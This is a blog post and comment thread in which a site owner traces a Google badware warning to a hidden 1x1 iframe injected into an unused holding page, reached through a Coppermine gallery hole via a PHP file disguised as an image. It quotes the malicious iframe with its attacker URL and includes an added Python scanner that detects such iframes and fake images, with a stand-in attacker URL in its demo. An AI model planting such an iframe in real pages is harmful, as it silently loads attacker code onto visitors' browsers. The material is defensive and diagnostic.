Thanks to an email from Jules, I finally got to the bottom of this affair. It was Jules’ email that pointed me in the right direction. It seems that I had been infected by this.
When Google first contacted me, they referred to badware on Felix Domesticus and as I pointed out before, this had suffered problems with an upgrade, so the scripts were all over the place. Having rebuilt it, I checked it and it was clean. As it turns out, it never was infected in the first place.
I subsequently noticed that this place, longrider.co.uk/blog, was also showing a warning, so I checked that out, too, and found nothing. Scans of both sites revealed them both to be clean. My conclusion that the googlebot was overreacting seemed to be confirmed by others experiencing similar difficulties. I asked Google to review my sites and they were given a clean bill of health.
Consequently, when Jules advised me that Google were once more labelling this site as dangerous, I was, understandably, annoyed. We had been through all this, and I was not looking forward to trawling through pages of script looking for a Will o’ the Wisp again. In his email, Jules told me that it was my main page that was infected. So, I went through index.php, header.php, sidebar.php and footer.php to no avail. I ran it through spybye.org and it came out as clean. I did the same for Felix Domesticus just in case. Again, clean. Then it hit me… Did Jules mean longrider.co.uk/index.htm? This is nothing more than a blank holding page that I never use. Yup, that was it. As it turned out, the compromised file was hiding in plain sight.
So, having found it at last and removed it, I can ask Google to review it again. How do I feel about my annoyance with Google now that their bot has been shown to be correct? Still annoyed, frankly. If their information had been more specific rather than downright misleading, I’d have discovered the malicious code more quickly. Simply telling me that there is something, somewhere on my site is less than helpful. Telling me that it is on one site when it is on another is misleading to the point of being completely useless. I’m reasonably tech savvy, but malicious code and hacking are not something with which I am familiar, so if I’m to trawl through the site, it helps to know what I am looking for. Jules’ link gave me that clue, so when spybye picked up the URL, I found it relatively easily.
So, Google, tell me what I am looking for and tell me with some degree of accuracy, where I should be looking and I won’t waste hours of my time on a fruitless search through lines of code that are perfectly okay.
As it turns out, the risk was relatively low anyway – Longrider Blog and Felix Domesticus were clean. If you do a search on Longrider, it is this place that comes up, not the holding page. So those of you who came straight here, there never was a risk to you.
It was annoying, certainly. Out of interest, in what way was your index.htm bad?
An iframe tag had been inserted:
[iframe src=’http://ccfelomvhk.com/dl/adv542.php’ width=1 height=1][/iframe]
Not hosting a website, I have to ask. Is this a customer service complaint?
Do you pay google to link to your site?
If not, surely they don’t have to really care where the problem is on your site, or even bother if they link to it?
Happy to help…& you may want to check here.
Coppermine is possibly a vulnerability.
James – no, I don’t pay them, which is just as well, given that they say I should allow several weeks for them to review the site. That, frankly, is piss-poor service, paid or not. However, they are complaining about badware on my site and expect me to do something about it. Reasonable enough. It is equally reasonable of me to expect some sort of clue as to what I should look for and where. Giving me blatantly misleading information helps no one.
Jules, thanks again. Yes, it looks like Coppermine was the route in. I found a rogue image file that was a php file in disguise – again, once I knew what I was looking for, it was simple enough to find it. None of the PHP files had been compromised, though. Having said that, I upgraded a few days ago, so maybe that wiped the rogue code away. Anyway, I’ve removed Coppermine for the moment. It does seem the safest option.
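The two indicators described in this thread (the 1×1 iframe inserted into index.htm, and the gallery "image" that was really a PHP file) are both things a site owner can check for directly rather than waiting for a vague warning. The script below is an added example, not code from this post or from Coppermine: it walks a web root, flags iframes that are tiny, invisible or point off-site, and flags files with image extensions whose bytes lack the expected image magic or contain a PHP open tag. The directory layout, the host name passed as `own_hosts` and the `attacker.invalid` URL in the sample files are assumptions constructed for the demo.

```python
#!/usr/bin/env python3
"""Added example: scan a web root for a hidden/off-site iframe and for
"images" that are really PHP scripts. Not the site's or Coppermine's code."""
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

IFRAME = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

# Magic bytes a genuine file with that extension must start with.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
}
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def _attrs(tag):
    """Parse name=value pairs out of one HTML start tag (quoted or bare)."""
    out = {}
    for m in ATTR.finditer(tag):
        out[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return out


def _px(value):
    """Leading integer of a width/height value ('1', '1px'), or None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def hidden_iframes(html, own_hosts=()):
    """Return iframes that are 0/1 pixel, hidden by style, or off-site."""
    hits = []
    for m in IFRAME.finditer(html):
        a = _attrs(m.group(0))
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        tiny = any(_px(a.get(d)) is not None and _px(a.get(d)) <= 1
                   for d in ("width", "height"))
        style = a.get("style", "").replace(" ", "").lower()
        invisible = "display:none" in style or "visibility:hidden" in style
        offsite = bool(host) and host not in {h.lower() for h in own_hosts}
        if tiny or invisible or offsite:
            hits.append({"src": src, "tiny": tiny, "invisible": invisible,
                         "offsite": offsite})
    return hits


def disguised_image(data, suffix):
    """Reason string if bytes claiming to be an image look like a script."""
    magic = IMAGE_MAGIC.get(suffix.lower())
    if magic is None:
        return None  # not an image extension this scanner knows
    if not data.startswith(magic):  # bytes.startswith accepts a tuple
        return "no %s magic bytes" % suffix
    if PHP_TAG.search(data):
        return "PHP open tag inside image data"
    return None


def scan_tree(root, own_hosts=()):
    """Walk root and return (path, finding) pairs for both indicators."""
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if not p.is_file():
            continue
        suf = p.suffix.lower()
        if suf in (".htm", ".html", ".php"):
            for hit in hidden_iframes(p.read_text(errors="replace"), own_hosts):
                findings.append((str(p), "hidden/offsite iframe -> %s" % hit["src"]))
        elif suf in IMAGE_MAGIC:
            reason = disguised_image(p.read_bytes(), suf)
            if reason:
                findings.append((str(p), reason))
    return findings


def demo():
    """Constructed sample tree (not real site files): one clean page, one
    holding page with an injected 1x1 iframe, one real GIF, one fake JPEG."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.htm").write_text(
            "<html><body>holding page"
            "<iframe src='http://attacker.invalid/dl/x.php' width=1 height=1></iframe>"
            "</body></html>")
        (root / "about.html").write_text(
            "<iframe src='/video' width=640 height=360></iframe>")
        albums = root / "albums"
        albums.mkdir()
        (albums / "real.gif").write_bytes(b"GIF89a" + b"\x00" * 16)
        (albums / "fake.jpg").write_bytes(b"<?php echo 'not an image'; ?>")
        return scan_tree(root, own_hosts=("longrider.co.uk",))


if __name__ == "__main__":
    for path, finding in demo():
        print(path, "->", finding)
```

Run it against a copy of the web root with your own domain(s) in `own_hosts`; a legitimately embedded off-site player will show up as `offsite`, so the output is a list to review, not a verdict. The magic-byte check is the useful part for gallery uploads: a file that Coppermine or any other gallery accepted as a picture but whose first bytes are not a JPEG/PNG/GIF header deserves a look regardless of what its extension says.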
I’ve noticed Coppermine has had some bad security issues. It’s a shame – I’d like to offer it as part of my hosting service, but on this record it’s not viable.
Peter, yes. I won’t be reinstalling it. I followed the link Jules gave to the support forum. Frankly, I was disturbed by the approach these people have towards their customers. Yes, I know it isn’t paid and they are volunteers, but that does not excuse bullying people to the point where they are apologising for asking a perfectly reasonable question. One user, Miriam, explained in some detail why their behaviour was so bad – with petty, childish rules and penalties, that people were afraid to ask questions. This, frankly, is disgraceful behaviour.
The admin admonished one person for providing details about the exploit’s payload – how it was disguised and where to find it. The reason he was admonished was because those details will not always be the same. So fucking what? That user gave me the information that I needed to find the payload on my site. Sure, the filename was different, but I found it. The admin on that forum is one of the most obnoxious, self-righteous, arrogant little creeps I’ve come across in a long time. Even if Coppermine was made 100% secure, that little prick is the reason I would never use it again. What a jerk!
Update – I notice that someone has experienced another attack following the issue of the patch. So, I guess the current best practice is to leave Coppermine well alone…
Well said about the code of conduct. Too many interfering busybodies. I just hope this nanny state/Big Brother government doesn’t take up regulation of the net/blogging as some form of holy crusade.